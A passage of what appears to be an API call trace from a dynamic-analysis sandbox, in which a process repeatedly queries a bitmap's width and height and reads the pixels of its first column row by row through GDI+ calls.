[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=128, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.533] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=129, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.533] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=130, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.533] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=131, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.533] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=132, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.533] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=133, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.533] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=134, color=0x19e028) returned 0x0
[0181.533] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.533] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=135, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=136, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=137, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=138, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=139, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=140, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=141, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.534] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.534] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=142, color=0x19e028) returned 0x0
[0181.534] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=143, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=144, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=145, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=146, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=147, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=148, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.535] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=149, color=0x19e028) returned 0x0
[0181.535] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.535] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=150, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.536] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=151, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.536] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=152, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.536] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=153, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.536] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=154, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.536] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=155, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.536] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.536] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=156, color=0x19e028) returned 0x0
[0181.536] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=157, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=158, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=159, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=160, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=161, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=162, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.537] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=163, color=0x19e028) returned 0x0
[0181.537] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.537] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.538] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=164, color=0x19e028) returned 0x0
[0181.538] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.538] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.538] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=165, color=0x19e028) returned 0x0
[0181.538] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.538] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.538] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=166, color=0x19e028) returned 0x0
[0181.538] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.538] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.538] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=167, color=0x19e028) returned 0x0
[0181.542] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.542] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.542] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=168, color=0x19e028) returned 0x0
[0181.542] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.542] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.542] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=169, color=0x19e028) returned 0x0
[0181.542] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.542] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.542] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=170, color=0x19e028) returned 0x0
[0181.542] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.542] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.542] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=171, color=0x19e028) returned 0x0
[0181.542] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.542] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.542] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=172, color=0x19e028) returned 0x0
[0181.542] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.542] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=173, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=174, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=175, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=176, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=177, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=178, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=179, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=180, color=0x19e028) returned 0x0
[0181.543] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.543] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.543] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=181, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=182, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=183, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=184, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=185, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=186, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=187, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=188, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.544] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.544] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=189, color=0x19e028) returned 0x0
[0181.544] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=190, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=191, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=192, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=193, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=194, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=195, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=196, color=0x19e028) returned 0x0
[0181.545] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.545] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.545] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=197, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=198, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=199, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=200, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=201, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=202, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=203, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=204, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.546] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.546] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=205, color=0x19e028) returned 0x0
[0181.546] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=206, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=207, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=208, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=209, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=210, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=211, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=212, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.547] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=213, color=0x19e028) returned 0x0
[0181.547] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.547] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=214, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.548] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=215, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.548] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=216, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.548] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=217, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.548] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=218, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.548] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=219, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.548] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.548] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=220, color=0x19e028) returned 0x0
[0181.548] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.549] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.549] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=221, color=0x19e028) returned 0x0
[0181.549] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.549] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.549] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=222, color=0x19e028) returned 0x0
[0181.549] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.549] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.549] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=223, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=224, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=225, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=226, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=227, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=228, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=229, color=0x19e028) returned 0x0
[0181.550] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.550] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.550] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=230, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=231, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=232, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=233, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=234, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
